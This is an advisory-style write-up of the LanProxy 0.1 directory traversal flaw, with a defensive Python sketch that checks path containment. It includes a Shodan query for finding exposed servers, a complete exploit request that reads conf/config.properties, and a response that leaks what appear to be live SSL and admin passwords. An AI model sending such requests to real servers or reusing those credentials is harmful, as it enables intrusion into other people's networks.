[CVE-2021-3019] LanProxy Directory Traversal
Lanproxy is an intranet penetration tool that proxies LAN personal computers and servers to the public network.
It supports TCP traffic forwarding and any protocol that runs over TCP (access to intranet websites, local payment interface debugging, SSH access,
remote desktop, etc.). LanProxy version 0.1 is vulnerable to a path traversal vulnerability that may allow an attacker to read conf/config.properties
and obtain credentials for the intranet connection.
Shodan search: "Server: LPS-0.1"
Reading configuration file
GET /../conf/config.properties HTTP/1.1
Host: vulnerablehost:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Server: LPS-0.1

server.bind=0.0.0.0
# Port for communication with proxy clients
# This is the port that clients connect to
server.port=4900
# SSL-related configuration
server.ssl.enable=true
server.ssl.bind=0.0.0.0
server.ssl.port=4993
server.ssl.jksPath=usa.nat.candycloud.xyz
server.ssl.keyStorePassword=j5740NtBDCdH1ay
server.ssl.keyManagerPassword=j5740NtBDCdH1ay
# This setting can be ignored
server.ssl.needsClientAuth=false
# Web-based online configuration management settings
# Server IP address; usually no need to change, the default is fine
config.server.bind=0.0.0.0
# Admin control panel port (port allowed through the security group)
config.server.port=8090
# Admin control panel username and password
config.admin.username=admin
config.admin.password=Twx7x03hCBbmwtr
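
Mitigation sketch, as an added example that is not LanProxy's own code and not from the original page: a simplified static-file handler that joins the request path onto its web root, next to a version that resolves the path and refuses anything outside the root. The directory name webpages, the function names and the sample tree (built in a temporary directory) are assumptions.

```python
import os
import tempfile
from urllib.parse import unquote, urlsplit

def naive_resolve(web_root, target):
    """Vulnerable pattern: concatenates the request path onto the web root."""
    return os.path.normpath(web_root + urlsplit(target).path)

def safe_resolve(web_root, target):
    """Return the real path of the requested file, or None if it leaves web_root."""
    path = unquote(urlsplit(target).path)      # decode %2e%2e forms once
    if "\x00" in path:
        return None
    root = os.path.realpath(web_root)
    candidate = os.path.realpath(os.path.join(root, path.lstrip("/")))
    # Containment check is done after ".." and symlinks have been resolved.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate if os.path.isfile(candidate) else None

def demo():
    """Build a constructed install tree and resolve three request targets."""
    base = os.path.realpath(tempfile.mkdtemp())
    web_root = os.path.join(base, "webpages")  # hypothetical directory name
    conf = os.path.join(base, "conf", "config.properties")
    os.makedirs(web_root)
    os.makedirs(os.path.dirname(conf))
    with open(os.path.join(web_root, "index.html"), "w") as f:
        f.write("<html></html>")
    with open(conf, "w") as f:
        f.write("config.admin.password=CONSTRUCTED-PLACEHOLDER\n")
    index = os.path.join(web_root, "index.html")
    return {
        # The naive join lands on the config file outside the web root.
        "naive_escapes": naive_resolve(web_root, "/../conf/config.properties") == conf,
        "safe_plain": safe_resolve(web_root, "/../conf/config.properties"),
        "safe_encoded": safe_resolve(web_root, "/%2e%2e/conf/config.properties"),
        "safe_index": safe_resolve(web_root, "/index.html") == index,
    }

if __name__ == "__main__":
    print(demo())
```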